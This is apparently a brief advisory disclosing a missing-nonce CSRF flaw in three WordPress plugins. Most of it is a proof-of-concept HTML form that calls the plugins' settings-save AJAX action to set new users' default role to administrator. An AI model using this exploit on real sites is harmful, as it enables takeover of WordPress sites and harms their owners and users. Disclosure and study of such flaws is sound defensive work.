The plugins Login/Signup Popup, Side Cart Woocommerce, and Waitlist Woocommerce are all vulnerable to cross-site request forgery due to a missing nonce check that would make it possible for attackers to update arbitrary options on a vulnerable WordPress site.
<html>
<body>
<form action="https://example.com/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="form" value="default_role=administrator" />
<input type="hidden" name="action" value="xoo_admin_settings_save" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>